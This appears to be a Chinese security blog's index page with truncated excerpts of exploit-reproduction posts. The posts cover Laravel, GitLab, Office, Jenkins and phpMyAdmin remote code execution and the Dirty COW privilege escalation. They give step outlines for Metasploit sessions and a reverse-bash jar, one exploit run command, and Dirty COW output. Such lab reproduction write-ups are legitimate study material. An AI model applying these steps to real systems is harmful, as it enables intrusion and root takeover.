CVE-2021-3129(Mac环境) 复现

名称: laravel 远程代码执行 (CVE-2021-3129) 描述: Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 测试环境:linux 在vulfocus上启动一个测试环境: 使用下列已经写好的测试脚本即可: 需要注意的是,这个执行脚本只支持在MacOS下执行,如果需要在linux下执行,还需要修改脚本中 base64 -b0为base64 -w0 即可: 执行结果如下:

查看全部


CVE-2021-22205 复现(需要注册和无需注册)

说明:CVE-2021-22205是gitlab的一个RCE漏洞,允许用户在上传特定的文件图片时,执行系统命令。 环境: Mac 电脑一台 安装djvumake命令 测试的GitLab版本:11.9 <= GitLab(CE/EE)< 13.8.813.9 <= GitLab(CE/EE)< 13.9.613.10 <= GitLab(CE/EE)< 13.10.3 开始-需要注册登录复现: 1.mac 命令行安装 djvumake 2.创建一个test.txt 文本在桌面,内容如下 3.使用djvumake命令压缩文本文件成图片 4.上传该图片到Gitlab,上传方式如下: 5. 附: 如果使用msf上线则需要修改test.txt 内容如下即可: 开始-无需注册复现: 使用以下脚本CVE-2021-22205.py 这个使用起来就简单多了,命令如下: […]

查看全部


CVE-2021-40444-复现之MSF上线

漏洞详细细节不再赘述,搜索引擎漏洞编号,详细信息和影响范围以及漏洞等级都有相应的说明。 复现环境: 1.Windows10 + 正版Office365 2.Metasploit 3.一个http服务,用来让Office打开文档时加载一个html文件内容。 开始: 一、msf相关准备: 1.生成一个dll文件备用: 2.启动msf并监听 二、使用Office word新建一个带有Bitmap image文档 1.windows电脑桌面右击新建—->Microsoft Word文档,打开新建的文档,插入个对象为 ”Bitmap image“,然后保存。如下: 2.把刚新建的word文档的后缀.docx修改成.rar,然后使用rar软件打开压缩包,修改word文件夹下的两个文件,word\document.xml 和 \word\_rels\document.xml.rels […]

查看全部


jenkins RCE(CVE-2019-1003000)复现

前言:漏洞详情直接搜cve编号查看即可,这里直接复现 1.制作一个反弹bash的jar包放在公网可远程调用,以下代码保存为jkrce.java代码如下: 2.创建文件夹META-INF/serverices/,编译并写jkrce类到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下: 3.在公网服务器里,创建路径/tools/jenkins/1/ 4.poc xxx.xxx.xxx.xxx替换成公网地址即可,其他不用填写。 等待反弹成功,成功后web页面提示如下:

查看全部


PhpMyAdmin 4.6.2后台命令执行Exp(cve-2016-5734)

cve-2016-5734利用EXP说明: 登录PhpMyadmin后可以直接执行命令,提权。 CODE: #!/usr/bin/env python “””cve-2016-5734.py: PhpMyAdmin 4.3.0 – 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/iamsecurity run: ./cve-2016-5734.py -u root –pwd=”” http://localhost/pma -c “system(‘ls -lua’ […]

查看全部


[提权] 脏牛漏洞 Dirty COW CVE-2016-5195 2.6.22 < 3.9 (x86/x64)

/* * (un)comment correct payload first (x86 or x64)! * * $ gcc cowroot.c -o cowroot -pthread * $ ./cowroot * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * Size of binary: 57048 * Racing, this may take a while.. * /usr/bin/passwd is overwritten * Popping root shell. * Don’t forget to restore /tmp/bak * thread stopped * thread stopped * [email protected]:/root/cow# id * uid= […]

查看全部